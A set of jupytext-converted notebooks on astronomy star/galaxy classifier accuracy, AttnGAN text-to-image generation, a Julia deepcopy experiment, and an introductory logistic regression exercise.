df['zspec'] = zspec
df['Qflag'] = Qflag; df['Q'] = Q
df['class'] = sgFlag
df[0:10]
df.to_csv('./DEIMOS/DEIMOS.csv', index=None)
import star_galaxy_models
rf_obj = star_galaxy_models.RandomForestModel()
rf_obj.read_rf_from_pickle()
features = ['wwpsfChiSq', 'wwExtNSigma', 'wwpsfLikelihood',
'wwPSFKronRatio', 'wwPSFKronDist', 'wwPSFApRatio',
'wwmomentRH', 'wwmomentXX', 'wwmomentXY', 'wwmomentYY',
'wwKronRad']
from sklearn.metrics import roc_curve, accuracy_score, auc, make_scorer
# ### ROC curve and Accuracy
ps1_dei = pd.read_csv('./DEIMOS/PS1_DEIMOS_features.csv').drop_duplicates(subset='objid')
print("PS1xDEIMOS catalog constains %i sources."%len(ps1_dei))
ps1_dei_det_mask = np.logical_and(ps1_dei['class'] != -999, (ps1_dei.nDetections>0)&(ps1_dei.wwKronFlux>0))
ps1_dei = ps1_dei[ps1_dei_det_mask]
print("%i sources are classified by both of the DEIMOS and the ML model."%len(ps1_dei))
ps1_df = pd.read_csv('./DEIMOS/HST_COSMOS_features.csv')
# +
dupl_mask = np.empty(len(ps1_dei), dtype=bool)
for i in range(len(dupl_mask)):
dupl_mask[i] = ps1_dei.objid.iloc[i] in np.array(ps1_df.objid)
print("Only %i sources are included both of the PS1xDEIMOS and the PS1xHST catalog..."%np.sum(dupl_mask))
ps1_dei = ps1_dei[~dupl_mask]
#print("%i sources are not contained in PS1xHST catalog."%len(ps1_dei))
# -
kron_mag = -2.5*np.log10(ps1_dei.wwKronFlux/3631)
ps1_dei_features = ps1_dei[features]
ps1_dei_class = ps1_dei['class']
ps1_dei_score = rf_obj.rf_clf_.predict_proba(ps1_dei_features)
ps1_dei_pred = rf_obj.rf_clf_.predict(ps1_dei_features)
print("Overall accuracy of the classification by the ML model is %f"%accuracy_score(ps1_dei_class, ps1_dei_pred))
fpr, tpr, thre = roc_curve(ps1_dei_class, ps1_dei_score[:,1])
plt.grid(linestyle='dotted')
plt.plot(fpr, tpr, 'k-')
#plt.xscale('log'); plt.yscale('log')
plt.xlim(1e-3, 1e-1); plt.ylim(0.1, 1.01)
plt.xlabel('FPR'); plt.ylabel('TPR')
plt.show()
# +
ps1_dei_class = np.array(ps1_dei_class)
ps1_dei_score = np.array(ps1_dei_score)
kron_mag = np.array(kron_mag)
binwidth = 1.5
Nboot = 100
mag_array = np.arange(14 , 23+binwidth, binwidth)
kron_mag = np.array(-2.5*np.log10(ps1_dei['wwKronFlux']/3631))
ml_acc_arr = np.zeros_like(mag_array, dtype=float)
ml_boot_scatt = np.vstack((np.zeros_like(mag_array, dtype=float), np.zeros_like(mag_array, dtype=float)))
for bin_num, binedge in enumerate(mag_array):
bin_sources = np.where((kron_mag >= binedge) & (kron_mag < binedge + binwidth))
ml_acc_arr[bin_num] = accuracy_score(ps1_dei_class[bin_sources],
ps1_dei_pred[bin_sources])
ml_boot_acc = np.empty(Nboot)
for i in range(Nboot):
boot_sources = np.random.choice(bin_sources[0], len(bin_sources[0]),
replace=True)
ml_boot_acc[i] = accuracy_score(ps1_dei_class[boot_sources],
ps1_dei_pred[boot_sources])
ml_boot_scatt[:,bin_num] = np.percentile(ml_boot_acc, [16, 84])
# +
from sklearn.neighbors import KernelDensity
kde_grid = np.linspace(10,26,200)
deimos_stars = np.where(ps1_dei_class == 1)
deimos_gal = np.where(ps1_dei_class == 0)
deimos_kde_gal_norm = len(deimos_gal[0])/len(ps1_dei_class)
deimos_kde_star_norm = 1 - deimos_kde_gal_norm
kde_deimos = KernelDensity(bandwidth=1.059*np.std(kron_mag, ddof=1)*len(kron_mag)**(-0.2),
rtol=1E-4)
kde_deimos.fit(kron_mag[:, np.newaxis])
kde_deimos_stars = KernelDensity(bandwidth=1.059*np.std(kron_mag[deimos_stars], ddof=1)*len(kron_mag[deimos_stars])**(-0.2),
rtol=1E-4)
kde_deimos_stars.fit(kron_mag[deimos_stars[0], np.newaxis])
kde_deimos_gal = KernelDensity(bandwidth=1.059*np.std(kron_mag[deimos_gal], ddof=1)*len(kron_mag[deimos_gal])**(-0.2),
rtol=1E-4)
kde_deimos_gal.fit(kron_mag[deimos_gal[0], np.newaxis])
pdf_deimos = np.exp(kde_deimos.score_samples(kde_grid[:, np.newaxis]))
pdf_deimos_stars = np.exp(kde_deimos_stars.score_samples(kde_grid[:, np.newaxis]))
pdf_deimos_gal = np.exp(kde_deimos_gal.score_samples(kde_grid[:, np.newaxis]))
# +
from matplotlib.ticker import MultipleLocator
#import seaborn as sns
color_dict = {'ml': "black"}
mag_bin_centers = mag_array + binwidth/2
#cmap_star = sns.cubehelix_palette(rot=0.5, light=0.7,dark=0.3,as_cmap=True)
#cmap_gal = sns.cubehelix_palette(start=0.3,rot=-0.5,light=0.7,dark=0.3,as_cmap=True)
fig, ax = plt.subplots(figsize=(8, 5))
ax.grid(linestyle='dotted', zorder=1)
ax.errorbar(mag_bin_centers, ml_acc_arr,
yerr=np.abs(ml_boot_scatt - ml_acc_arr),
ls='-', lw=.75, fmt='o',
color=color_dict['ml'], label="ML model",
linewidth=1.5, markersize=7.5, zorder=5)
# add KDE plots
ax.fill(kde_grid, pdf_deimos + 0.5, alpha=0.4, color="0.7", zorder=2)
ax.fill(kde_grid, pdf_deimos_gal*deimos_kde_gal_norm + 0.5, alpha=0.7, zorder=3)#, color=cmap_gal(0.25))
ax.fill(kde_grid, pdf_deimos_stars*deimos_kde_star_norm + 0.5, alpha=0.7, zorder=4)#, color=cmap_star(0.25))
ax.set_ylim(0.5,1.01)
ax.set_xlim(14, 24)
ax.tick_params(which="both", top=True, right=True, labelsize=15)
ax.set_xlabel('whiteKronMag', fontsize=15)
ax.set_ylabel('Accuracy', fontsize=15)
ax.yaxis.set_minor_locator(MultipleLocator(0.025))
ax.xaxis.set_major_locator(MultipleLocator(2))
ax.xaxis.set_minor_locator(MultipleLocator(0.5))
#ax.legend(bbox_to_anchor=(0.01, 0.3, 1., 0.102), loc=3, fontsize=13)
fig.subplots_adjust(top=0.98,right=0.98,left=0.1,bottom=0.12)
# -
# ## Accuracy v.s. MAG with DEIMOSxHST
from astropy.table import Table
deimos = pd.read_csv('./DEIMOS/DEIMOS.csv')
hst = Table.read('./DEIMOS/HST_COSMOS.fit').to_pandas()
hstX = np.empty((len(hst), 2), dtype=np.float64)
hstX[:, 0] = hst['ALPHA_J2000']
hstX[:, 1] = hst['DELTA_J2000']
deiX = np.empty((len(deimos), 2), dtype=np.float64)
deiX[:, 0] = deimos['ra']
deiX[:, 1] = deimos['dec']
# Cross-matching the sources in the DEIMOS catalog within radius = 0.5 arcsec around those in the HST catalog
from astroML.crossmatch import crossmatch_angular
max_radius = 0.5 / 3600 # 0.5 arcsec
dist, ind = crossmatch_angular(hstX, deiX, max_radius)
match = ~np.isinf(dist)
print("The number of sources cross-matched is %i"%np.sum(match))
plt.hist(dist[match]*3600, bins=np.arange(0, 0.5,0.01))
plt.xlabel('Distance')
plt.show()
# The distribution of the distance has a peak at 0.1 arcsec. Changes the cross-matching radius to 0.3 arcsec.
from astroML.crossmatch import crossmatch_angular
max_radius = 0.3 / 3600 # 0.3 arcsec
dist, ind = crossmatch_angular(hstX, deiX, max_radius)
match = ~np.isinf(dist)
print("The number of sources cross-matched is %i"%np.sum(match))
plt.hist(dist[match]*3600, bins=np.arange(0, 0.5,0.01))
plt.xlabel('Distance')
plt.show()
hst_match = hst[match]
deimos_match = deimos.loc[ind[match]]
# Remove duplicated sources.
dupl_mask = deimos_match.duplicated('ra')
deimos_match_uniq = deimos_match[~dupl_mask.values]
hst_match_uniq = hst_match[~dupl_mask.values]
# Remove the sources which are not able to be classified to star or galaxy by the DEIMOS catalog.
good_mask = deimos_match_uniq["class"] != -999
deimos_match_uniq_good = deimos_match_uniq[good_mask.values]
hst_match_uniq_good = hst_match_uniq[good_mask.values]
print("The number of sources used to verify the classification accuracy is %i"%len(deimos_match_uniq))
xlims = [12, 29]
ylims = [12, 29]
plt.hexbin(hst_match_uniq["MAG_BEST"], deimos_match_uniq["imag"],
extent=[xlims[0], xlims[1], ylims[0], ylims[1]],
bins='log', cmap='viridis')
plt.xlim(xlims); plt.ylim(ylims)
plt.xlabel('MAG_BEST(HST)')
plt.ylabel('imag(DEIMOS)')
from sklearn.metrics import accuracy_score
print("The overall accuracy od the crassification of the HST catalog is %0.4f"\
# %accuracy_score(deimos_match_uniq_good["class"], hst_match_uniq_good["MU_CLASS"]-1))
# ### Accuracy v.s. MAG
# +
dei_class = np.array(deimos_match_uniq_good["class"], dtype=int)
hst_class = np.array(hst_match_uniq_good["MU_CLASS"]-1, dtype=int)
kron_mag = np.array(hst_match_uniq_good["MAG_BEST"])
binwidth = 1
Nboot = 100
mag_array = np.arange(14 , 26+binwidth, binwidth)
ml_acc_arr = np.zeros_like(mag_array, dtype=float)
ml_boot_scatt = np.vstack((np.zeros_like(mag_array, dtype=float), np.zeros_like(mag_array, dtype=float)))
for bin_num, binedge in enumerate(mag_array):
bin_sources = np.where((kron_mag >= binedge) & (kron_mag < binedge + binwidth))
ml_acc_arr[bin_num] = accuracy_score(dei_class[bin_sources],
hst_class[bin_sources])
ml_boot_acc = np.empty(Nboot)
for i in range(Nboot):
boot_sources = np.random.choice(bin_sources[0], len(bin_sources[0]),
replace=True)
ml_boot_acc[i] = accuracy_score(dei_class[boot_sources],
hst_class[boot_sources])
ml_boot_scatt[:,bin_num] = np.percentile(ml_boot_acc, [16, 84])
# +
from sklearn.neighbors import KernelDensity
kde_grid = np.linspace(10,29,200)
deimos_stars = np.where(dei_class == 1)
deimos_gal = np.where(dei_class == 0)
deimos_kde_gal_norm = len(deimos_gal[0])/len(dei_class)
deimos_kde_star_norm = 1 - deimos_kde_gal_norm
kde_deimos = KernelDensity(bandwidth=1.059*np.std(kron_mag, ddof=1)*len(kron_mag)**(-0.2),
rtol=1E-4)
kde_deimos.fit(kron_mag[:, np.newaxis])
kde_deimos_stars = KernelDensity(bandwidth=1.059*np.std(kron_mag[deimos_stars], ddof=1)*len(kron_mag[deimos_stars])**(-0.2),
rtol=1E-4)
kde_deimos_stars.fit(kron_mag[deimos_stars[0], np.newaxis])
kde_deimos_gal = KernelDensity(bandwidth=1.059*np.std(kron_mag[deimos_gal], ddof=1)*len(kron_mag[deimos_gal])**(-0.2),
rtol=1E-4)
kde_deimos_gal.fit(kron_mag[deimos_gal[0], np.newaxis])
pdf_deimos = np.exp(kde_deimos.score_samples(kde_grid[:, np.newaxis]))
pdf_deimos_stars = np.exp(kde_deimos_stars.score_samples(kde_grid[:, np.newaxis]))
pdf_deimos_gal = np.exp(kde_deimos_gal.score_samples(kde_grid[:, np.newaxis]))
# +
from matplotlib.ticker import MultipleLocator
#import seaborn as sns
color_dict = {'ml': "black"}
mag_bin_centers = mag_array + binwidth/2
#cmap_star = sns.cubehelix_palette(rot=0.5, light=0.7,dark=0.3,as_cmap=True)
#cmap_gal = sns.cubehelix_palette(start=0.3,rot=-0.5,light=0.7,dark=0.3,as_cmap=True)
fig, ax = plt.subplots(figsize=(8, 5))
ax.grid(linestyle='dotted', zorder=1)
ax.errorbar(mag_bin_centers, ml_acc_arr,
yerr=np.abs(ml_boot_scatt - ml_acc_arr),
ls='-', lw=.75, fmt='o',
color=color_dict['ml'], label="ML model",
linewidth=1.5, markersize=7.5, zorder=5)
# add KDE plots
ax.fill(kde_grid, pdf_deimos + 0.5, alpha=0.4, color="0.7", zorder=2)
ax.fill(kde_grid, pdf_deimos_gal*deimos_kde_gal_norm + 0.5, alpha=0.7, zorder=3)#, color=cmap_gal(0.25))
ax.fill(kde_grid, pdf_deimos_stars*deimos_kde_star_norm + 0.5, alpha=0.7, zorder=4)#, color=cmap_star(0.25))
ax.set_ylim(0.5,1.01)
ax.set_xlim(14, 27)
ax.tick_params(which="both", top=True, right=True, labelsize=15)
ax.set_xlabel('MAG_BEST', fontsize=15)
ax.set_ylabel('Accuracy', fontsize=15)
ax.yaxis.set_minor_locator(MultipleLocator(0.025))
ax.xaxis.set_major_locator(MultipleLocator(2))
ax.xaxis.set_minor_locator(MultipleLocator(0.5))
#ax.legend(bbox_to_anchor=(0.01, 0.3, 1., 0.102), loc=3, fontsize=13)
fig.subplots_adjust(top=0.98,right=0.98,left=0.1,bottom=0.12)
# -
|
PS1casjobs/DEIMOS_COSMOS.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:py2]
# language: python
# name: conda-env-py2-py
# ---
# # SETUP
# !rm -rf ../coco/coco_AttnGAN2.pth
# !cp ../coco_AttnGAN2.pth ../coco/
import pandas as pd
import numpy as np
from __future__ import print_function
import nltk
import warnings
warnings.filterwarnings('ignore')
# nltk.download('all')
captions = pd.read_excel('../captions.xlsx')
captions.columns = [u'id', u'image_id', u'CAPTIONS', u'Unnamed: 3']
captions.image_id = captions.image_id.apply(lambda x: x.replace('.jpg',''))
captions.head()
from miscc.config import cfg, cfg_from_file
from datasets import TextDataset
from trainer import condGANTrainer as trainer
# +
import os
import sys
import time
import random
import pprint
import datetime
import dateutil.tz
import argparse
import numpy as np
import torch
import torchvision.transforms as transforms
import matplotlib.pyplot as plt
# -
cfg_from_file('cfg/coco.yml')
# +
cfg.GPU_ID = 0
random.seed(100)
np.random.seed(100)
torch.manual_seed(100)
if cfg.CUDA:
torch.cuda.manual_seed_all(100)
now = datetime.datetime.now(dateutil.tz.tzlocal())
timestamp = now.strftime('%Y_%m_%d_%H_%M_%S')
output_dir = '../output/%s_%s_%s' % (cfg.DATASET_NAME, cfg.CONFIG_NAME, timestamp)
split_dir, bshuffle = 'images', True
# -
imsize = cfg.TREE.BASE_SIZE * (2 ** (cfg.TREE.BRANCH_NUM - 1))
image_transform = transforms.Compose([
transforms.Scale(int(imsize * 76 / 64)),
transforms.RandomCrop(imsize),
transforms.RandomHorizontalFlip()])
# +
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from nltk.tokenize import RegexpTokenizer
from collections import defaultdict
from miscc.config import cfg
import torch
import torch.utils.data as data
from torch.autograd import Variable
import torchvision.transforms as transforms
import os
import sys
import numpy as np
import pandas as pd
from PIL import Image
import numpy.random as random
if sys.version_info[0] == 2:
import cPickle as pickle
else:
import pickle
from __future__ import print_function
from six.moves import range
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
import torch.backends.cudnn as cudnn
from PIL import Image
from miscc.config import cfg
from miscc.utils import mkdir_p
from miscc.utils import build_super_images, build_super_images2
from miscc.utils import weights_init, load_params, copy_G_params
from miscc.utils import *
from model import G_DCGAN, G_NET
from datasets import prepare_data
from model import RNN_ENCODER, CNN_ENCODER
from miscc.losses import words_loss
from miscc.losses import discriminator_loss, generator_loss, KL_loss
import os
import time
import numpy as np
import sys
# +
class TextDataset(data.Dataset):
def __init__(self, data_dir, split='train',
base_size=64,
transform=None, target_transform=None):
self.transform = transform
self.norm = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
self.target_transform = target_transform
self.embeddings_num = cfg.TEXT.CAPTIONS_PER_IMAGE
self.imsize = []
for i in range(cfg.TREE.BRANCH_NUM):
self.imsize.append(base_size)
base_size = base_size * 2
self.data = []
self.data_dir = data_dir
if data_dir.find('birds') != -1:
self.bbox = self.load_bbox()
else:
self.bbox = None
split_dir = os.path.join(data_dir, split)
self.filenames, self.captions, self.ixtoword, \
self.wordtoix, self.n_words = self.load_text_data(data_dir, split)
self.class_id = self.load_class_id(split_dir, len(self.filenames))
self.number_example = len(self.filenames)
def load_bbox(self):
data_dir = self.data_dir
bbox_path = os.path.join(data_dir, 'CUB_200_2011/bounding_boxes.txt')
df_bounding_boxes = pd.read_csv(bbox_path,
delim_whitespace=True,
header=None).astype(int)
#
filepath = os.path.join(data_dir, 'CUB_200_2011/images.txt')
df_filenames = \
pd.read_csv(filepath, delim_whitespace=True, header=None)
filenames = df_filenames[1].tolist()
print('Total filenames: ', len(filenames), filenames[0])
#
filename_bbox = {img_file[:-4]: [] for img_file in filenames}
numImgs = len(filenames)
for i in xrange(0, numImgs):
# bbox = [x-left, y-top, width, height]
bbox = df_bounding_boxes.iloc[i][1:].tolist()
key = filenames[i][:-4]
filename_bbox[key] = bbox
#
return filename_bbox
def load_captions(self, data_dir, filenames):
all_captions = []
for caption in captions.CAPTIONS:
tokenizer = RegexpTokenizer(r'\w+')
tokens = tokenizer.tokenize(caption.lower())
tokens_new = []
for t in tokens:
t = t.encode('ascii', 'ignore').decode('ascii')
if len(t) > 0:
tokens_new.append(t)
all_captions.append(tokens_new)
return all_captions
def build_dictionary(self, train_captions, test_captions):
word_counts = defaultdict(float)
captions = train_captions + test_captions
for sent in captions:
for word in sent:
word_counts[word] += 1
with open('wordtoix.pickle', 'rb') as handle:
wordtoix = pickle.load(handle)
with open('ixtoword.pickle', 'rb') as handle:
ixtoword = pickle.load(handle)
train_captions_new = []
for t in train_captions:
rev = []
for w in t:
if w in wordtoix:
rev.append(wordtoix[w])
# rev.append(0) # do not need '<end>' token
train_captions_new.append(rev)
test_captions_new = []
for t in test_captions:
rev = []
for w in t:
if w in wordtoix:
rev.append(wordtoix[w])
# rev.append(0) # do not need '<end>' token
test_captions_new.append(rev)
return [train_captions_new, test_captions_new,
ixtoword, wordtoix, len(ixtoword)]
def load_text_data(self, data_dir, split):
filepath = os.path.join(data_dir, 'captions.pickle')
captions = pd.read_excel('../captions.xlsx')
captions.columns = [u'id', u'image_id', u'CAPTIONS', u'Unnamed: 3']
captions.image_id = captions.image_id.apply(lambda x: x.replace('.jpg',''))
train_names = captions.image_id
test_names = captions.image_id
train_captions = self.load_captions(data_dir, train_names)
test_captions = self.load_captions(data_dir, test_names)
train_captions, test_captions, ixtoword, wordtoix, n_words = \
self.build_dictionary(train_captions, test_captions)
with open(filepath, 'wb') as f:
pickle.dump([train_captions, test_captions,
ixtoword, wordtoix], f, protocol=2)
print('Save to: ', filepath)
# a list of list: each list contains
# the indices of words in a sentence
captions = train_captions
filenames = train_names
return filenames, captions, ixtoword, wordtoix, n_words
def load_class_id(self, data_dir, total_num):
if os.path.isfile(data_dir + '/class_info.pickle'):
with open(data_dir + '/class_info.pickle', 'rb') as f:
class_id = pickle.load(f)
else:
class_id = np.arange(total_num)
return class_id
def get_caption(self, sent_ix):
# a list of indices for a sentence
sent_caption = np.asarray(self.captions[sent_ix]).astype('int64')
if (sent_caption == 0).sum() > 0:
print('ERROR: do not need END (0) token', sent_caption)
num_words = len(sent_caption)
# pad with 0s (i.e., '<end>')
x = np.zeros((cfg.TEXT.WORDS_NUM, 1), dtype='int64')
x_len = num_words
if num_words <= cfg.TEXT.WORDS_NUM:
x[:num_words, 0] = sent_caption
else:
ix = list(np.arange(num_words)) # 1, 2, 3,..., maxNum
np.random.shuffle(ix)
ix = ix[:cfg.TEXT.WORDS_NUM]
ix = np.sort(ix)
x[:, 0] = sent_caption[ix]
x_len = cfg.TEXT.WORDS_NUM
return x, x_len
def __getitem__(self, index):
#
key = self.filenames[index]
cls_id = self.class_id[index]
#
if self.bbox is not None:
bbox = self.bbox[key]
data_dir = '%s/CUB_200_2011' % self.data_dir
else:
bbox = None
data_dir = self.data_dir
#
img_name = '%s/images/%s.jpg' % (data_dir, key)
imgs = get_imgs(img_name, self.imsize,
bbox, self.transform, normalize=self.norm)
# random select a sentence
sent_ix = random.randint(0, self.embeddings_num)
new_sent_ix = index * self.embeddings_num + sent_ix
caps, cap_len = self.get_caption(new_sent_ix)
return imgs, caps, cap_len, cls_id, key
def __len__(self):
return len(self.filenames)
def get_imgs(img_path, imsize, bbox=None,
transform=None, normalize=None):
img = Image.open(img_path).convert('RGB')
width, height = img.size
if bbox is not None:
r = int(np.maximum(bbox[2], bbox[3]) * 0.75)
center_x = int((2 * bbox[0] + bbox[2]) / 2)
center_y = int((2 * bbox[1] + bbox[3]) / 2)
y1 = np.maximum(0, center_y - r)
y2 = np.minimum(height, center_y + r)
x1 = np.maximum(0, center_x - r)
x2 = np.minimum(width, center_x + r)
img = img.crop([x1, y1, x2, y2])
if transform is not None:
img = transform(img)
ret = []
if cfg.GAN.B_DCGAN:
ret = [normalize(img)]
else:
for i in range(cfg.TREE.BRANCH_NUM):
# print(imsize[i])
if i < (cfg.TREE.BRANCH_NUM - 1):
re_img = transforms.Scale(imsize[i])(img)
else:
re_img = img
ret.append(normalize(re_img))
return ret
# +
def build_super_images2(real_imgs, captions, cap_lens, ixtoword,
attn_maps, att_sze, vis_size=256, topK=5):
batch_size = real_imgs.size(0)
max_word_num = np.max(cap_lens)
text_convas = np.ones([batch_size * FONT_MAX,
max_word_num * (vis_size + 2), 3],
dtype=np.uint8)
real_imgs = \
nn.Upsample(size=(vis_size, vis_size), mode='bilinear')(real_imgs)
# [-1, 1] --> [0, 1]
real_imgs.add_(1).div_(2).mul_(255)
real_imgs = real_imgs.data.numpy()
# b x c x h x w --> b x h x w x c
real_imgs = np.transpose(real_imgs, (0, 2, 3, 1))
pad_sze = real_imgs.shape
middle_pad = np.zeros([pad_sze[2], 2, 3])
# batch x seq_len x 17 x 17 --> batch x 1 x 17 x 17
img_set = []
num = len(attn_maps)
text_map, sentences = \
drawCaption(text_convas, captions, ixtoword, vis_size, off1=0)
text_map = np.asarray(text_map).astype(np.uint8)
bUpdate = 1
for i in range(num):
attn = attn_maps[i].cpu().view(1, -1, att_sze, att_sze)
#
attn = attn.view(-1, 1, att_sze, att_sze)
attn = attn.repeat(1, 3, 1, 1).data.numpy()
# n x c x h x w --> n x h x w x c
attn = np.transpose(attn, (0, 2, 3, 1))
num_attn = cap_lens[i]
thresh = 2./float(num_attn)
#
img = real_imgs[i]
row = []
row_merge = []
row_txt = []
row_beforeNorm = []
conf_score = []
for j in range(num_attn):
one_map = attn[j]
mask0 = one_map > (2. * thresh)
conf_score.append(np.sum(one_map * mask0))
mask = one_map > thresh
one_map = one_map * mask
if (vis_size // att_sze) > 1:
one_map = \
skimage.transform.pyramid_expand(one_map, sigma=20,
upscale=vis_size // att_sze)
minV = one_map.min()
maxV = one_map.max()
one_map = (one_map - minV) / (maxV - minV)
row_beforeNorm.append(one_map)
sorted_indices = np.argsort(conf_score)[::-1]
for j in range(num_attn):
one_map = row_beforeNorm[j]
one_map *= 255
#
PIL_im = Image.fromarray(np.uint8(img))
PIL_att = Image.fromarray(np.uint8(one_map))
merged = \
Image.new('RGBA', (vis_size, vis_size), (0, 0, 0, 0))
mask = Image.new('L', (vis_size, vis_size), (180)) # (210)
merged.paste(PIL_im, (0, 0))
merged.paste(PIL_att, (0, 0), mask)
merged = np.array(merged)[:, :, :3]
row.append(np.concatenate([one_map, middle_pad], 1))
#
row_merge.append(np.concatenate([merged, middle_pad], 1))
#
txt = text_map[i * FONT_MAX:(i + 1) * FONT_MAX,
j * (vis_size + 2):(j + 1) * (vis_size + 2), :]
row_txt.append(txt)
# reorder
row_new = []
row_merge_new = []
txt_new = []
for j in range(num_attn):
idx = sorted_indices[j]
row_new.append(row[idx])
row_merge_new.append(row_merge[idx])
txt_new.append(row_txt[idx])
row = np.concatenate(row_new[:topK], 1)
row_merge = np.concatenate(row_merge_new[:topK], 1)
txt = np.concatenate(txt_new[:topK], 1)
if txt.shape[1] != row.shape[1]:
print('Warnings: txt', txt.shape, 'row', row.shape,
'row_merge_new', row_merge_new.shape)
bUpdate = 0
break
row = np.concatenate([txt, row_merge], 0)
img_set.append(row)
if bUpdate:
img_set = np.concatenate(img_set, 0)
img_set = img_set.astype(np.uint8)
return img_set, sentences
else:
return None
def drawCaption(convas, captions, ixtoword, vis_size, off1=2, off2=2):
num = captions.size(0)
img_txt = Image.fromarray(convas)
# get a font
# fnt = None # ImageFont.truetype('Pillow/Tests/fonts/FreeMono.ttf', 50)
# fnt = ImageFont.truetype('Pillow/Tests/fonts/FreeMono.ttf', 50)
# fnt = ImageFont.truetype("arial.ttf", 50)
# get a drawing context
d = ImageDraw.Draw(img_txt)
sentence_list = []
for i in range(num):
cap = captions[i].data.cpu().numpy()
sentence = []
for j in range(len(cap)):
if cap[j] == 0:
break
word = ixtoword[cap[j]].encode('ascii', 'ignore').decode('ascii')
d.text(((j + off1) * (vis_size + off2), i * FONT_MAX), '%d:%s' % (j, word[:6]), fill=(255, 255, 255, 255))
sentence.append(word)
sentence_list.append(sentence)
return img_txt, sentence_list
# -
def algo_gen_example(self, data_dic):
if NET_G == '':
print('Error: the path for morels is not found!')
else:
# Build and load the generator
text_encoder = \
RNN_ENCODER(self.n_words, nhidden=cfg.TEXT.EMBEDDING_DIM)
state_dict = \
torch.load(NET_E, map_location=lambda storage, loc: storage)
text_encoder.load_state_dict(state_dict)
print('Load text encoder from:', cfg.TRAIN.NET_E)
text_encoder = text_encoder.cuda()
text_encoder.eval()
# the path to save generated images
if cfg.GAN.B_DCGAN:
netG = G_DCGAN()
else:
netG = G_NET()
s_tmp = NET_G[:NET_G.rfind('.pth')]
model_dir = NET_G
state_dict = \
torch.load(model_dir, map_location=lambda storage, loc: storage)
netG.load_state_dict(state_dict)
print('Load G from: ', model_dir)
netG.cuda()
netG.eval()
for key in data_dic:
captions, cap_lens, sorted_indices = data_dic[key]
batch_size = captions.shape[0]
nz = cfg.GAN.Z_DIM
captions = Variable(torch.from_numpy(captions), volatile=True)
cap_lens = Variable(torch.from_numpy(cap_lens), volatile=True)
captions = captions.cuda()
cap_lens = cap_lens.cuda()
for i in range(1): # 16
noise = Variable(torch.FloatTensor(batch_size, nz), volatile=True)
noise = noise.cuda()
#######################################################
# (1) Extract text embeddings
######################################################
hidden = text_encoder.init_hidden(batch_size)
# words_embs: batch_size x nef x seq_len
# sent_emb: batch_size x nef
words_embs, sent_emb = text_encoder(captions, cap_lens, hidden)
mask = (captions == 0)
#######################################################
# (2) Generate fake images
######################################################
noise.data.normal_(0, 1)
fake_imgs, attention_maps, _, _ = netG(noise, sent_emb, words_embs, mask)
# G attention
cap_lens_np = cap_lens.cpu().data.numpy()
for j in range(batch_size):
for k in range(len(fake_imgs)):
im = fake_imgs[k][j].data.cpu().numpy()
im = (im + 1.0) * 127.5
im = im.astype(np.uint8)
# print('im', im.shape)
im = np.transpose(im, (1, 2, 0))
# print('im', im.shape)
im = Image.fromarray(im)
plt.imshow(im)
def gen_example(wordtoix, algo, sent):
'''generate images from example sentences'''
from nltk.tokenize import RegexpTokenizer
data_dic = {}
tokenizer = RegexpTokenizer(r'\w+')
tokens = tokenizer.tokenize(sent.lower())
rev = []
for t in tokens:
t = t.encode('ascii', 'ignore').decode('ascii')
if len(t) > 0 and t in wordtoix:
rev.append(wordtoix[t])
captions = []
cap_lens = []
captions.append(rev)
cap_lens.append(len(rev))
max_len = np.max(cap_lens)
sorted_indices = np.argsort(cap_lens)[::-1]
cap_lens = np.asarray(cap_lens)
cap_lens = cap_lens[sorted_indices]
cap_array = np.zeros((len(captions), max_len), dtype='int64')
for i in range(len(captions)):
idx = sorted_indices[i]
cap = captions[idx]
c_len = len(cap)
cap_array[i, :c_len] = cap
data_dic['out'] = [cap_array, cap_lens, sorted_indices]
algo_gen_example(algo, data_dic)
# # RUN
cfg.TRAIN.MAX_EPOCH = 30
dataset = TextDataset(cfg.DATA_DIR, split_dir,
base_size=cfg.TREE.BASE_SIZE,
transform=image_transform)
dataloader = torch.utils.data.DataLoader(
dataset, batch_size=cfg.TRAIN.BATCH_SIZE,
drop_last=True, shuffle=bshuffle, num_workers=int(cfg.WORKERS))
algo = trainer(output_dir, dataloader, dataset.n_words, dataset.ixtoword)
algo.train()
NET_E = '../coco/text_encoder100.pth'
NET_G = '../coco/coco_AttnGAN2.pth'
i =224
gen_example(dataset.wordtoix, algo, captions.CAPTIONS[i])
captions.CAPTIONS[i], plt.imshow(Image.open('../coco/images/'+captions.image_id[i]+'.jpg'))
|
code/Exp_new.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .jl
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Julia 1.6.3
# language: julia
# name: julia-1.6
# ---
struct Foo{A, B} a::A; b::B end
foo = Foo(1, 2)
foo1 = deepcopy(foo)
@which deepcopy(foo)
struct Bar{T}
a::T
b::T
Bar(a) = new{typeof(a)}(a, oftype(a, 2)a)
end
bar = Bar(1)
bar1 = deepcopy(bar)
y = ccall(:jl_new_struct_uninit, Any, (Any,), typeof(bar))
ccall(:jl_set_nth_field, Cvoid, (Any, Csize_t, Any), y, 2-1, 3)
|
0022/deepcopty.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Supervised Learning
# # Logistic Regression:
# +
# Logistic Regresion:
Linear Regression v/s Logistic Regression:
1. Solves Regression Problems 1. Solves Classification Problems
2. Works with continuous variables 2. Works with Categorical variables
3. Straight Line (Best Fit Line) 3. Sigmoid Curve
Linear Regression -> Qualitative
Logistic Regression -> Quantitative
# -
# Nominal: Data with no inherent order or ranking
#
#
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
# # Predict whether the person buys the insurance or not:
# ## ML and DL:
#
# ML : low dimensional data
#
# DL: High dimensional data - huge amount of data
# ### Our goal is to first set the "bought_insurance" as : below age of 30: No (0), above 30: Yes (1):
#
# except 1 : age 25 -> nought_insurance = 1
df = pd.DataFrame({"age":[28,29,34,35,14,16,52,53,62,34,35,23,43,47,50,25,54,23,29,20],"bought_insurance":[0,0,1,1,0,0,1,1,1,1,1,0,1,1,1,1,1,0,0,0]})
